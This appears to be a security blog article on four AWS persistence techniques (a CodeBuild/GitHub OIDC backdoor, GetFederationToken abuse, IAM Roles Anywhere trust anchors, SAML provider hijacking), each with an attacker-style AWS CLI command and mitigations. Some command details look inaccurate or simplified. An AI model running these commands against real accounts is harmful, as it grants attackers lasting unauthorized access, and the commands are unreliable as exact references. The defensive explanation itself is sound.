AWS Persistence Techniques: How Attackers Maintain Long-Term Access

Listen to this Post

🐢▶️ Listen🚀

Introduction

Attackers are constantly evolving their techniques to maintain persistence in cloud environments like AWS. By exploiting misconfigurations, abusing legitimate services, and leveraging temporary credentials, they can establish long-term access even after initial compromises are detected. This article explores four advanced AWS persistence techniques and provides actionable mitigation strategies.

Learning Objectives

• Understand how attackers abuse CodeBuild + GitHub OIDC for persistent access.
• Learn how GetFederationToken can be exploited for temporary credential abuse.
• Recognize the risks of IAM Roles Anywhere and SAML IdP hijacking.

1. CodeBuild + GitHub OIDC Backdoor

Command:

aws codebuild create-project --name "MaliciousBuild" --source type=GITHUB \ 
--source location=https://github.com/attacker/repo --service-role arn:aws:iam::123456789012:role/CodeBuildRole

What It Does:

Attackers create a CodeBuild project linked to a GitHub repository with OpenID Connect (OIDC) integration. Every time a GitHub workflow runs, fresh temporary AWS credentials are issued, allowing persistent access.

Mitigation:

• Restrict IAM roles used by CodeBuild with least-privilege policies.
• Monitor for unusual CodeBuild activity in CloudTrail.

2. GetFederationToken Abuse

Command:

aws sts get-federation-token --name Attacker --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

What It Does:

This command generates temporary credentials valid for up to 36 hours, which attackers can use to maintain access without triggering permanent credential alerts.

Mitigation:

• Limit `GetFederationToken` permissions in IAM policies.
• Use AWS GuardDuty to detect anomalous STS API calls.

3. IAM Roles Anywhere with X.509 Certificates

Command:

aws rolesanywhere create-trust-anchor --name MaliciousAnchor --source x509Certificate="--BEGIN CERTIFICATE--..."

What It Does:

Attackers upload a malicious X.509 certificate to assume IAM roles from outside AWS, bypassing traditional credential checks.

Mitigation:

• Disable IAM Roles Anywhere if unused.
• Enforce strict certificate validation and rotation.

4. SAML Identity Provider Hijacking

Command:

aws iam update-saml-provider --saml-metadata-document file://malicious_metadata.xml --saml-provider-arn arn:aws:iam::123456789012:saml-provider/ADFS

What It Does:

By modifying a SAML IdP’s metadata, attackers can redirect authentication to a malicious endpoint and assume trusted roles.

Mitigation:

• Enable MFA for SAML-based roles.
• Monitor SAML provider changes in CloudTrail.

What Undercode Say

• Key Takeaway 1: Attackers increasingly abuse cloud-native services (CodeBuild, IAM Roles Anywhere) for stealthy persistence.
• Key Takeaway 2: Temporary credentials (STS, OIDC) are a major blind spot in AWS security monitoring.

Analysis:

Cloud environments require continuous monitoring for abnormal API calls, especially around credential issuance and role assumptions. Organizations must adopt zero-trust principles, enforce strict IAM policies, and automate detection for these persistence techniques.

Prediction

As cloud adoption grows, attackers will develop more sophisticated persistence methods, such as abusing serverless functions (Lambda) or container services (ECS/EKS). Proactive hardening and behavioral analytics will become critical defenses.

For further reading, check the original sources:

• CodeBuild + GitHub OIDC
• GetFederationToken Abuse
• IAM Roles Anywhere
• SAML IdP Hijacking

IT/Security Reporter URL:

Reported By: Adan %C3%A1lvarez – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram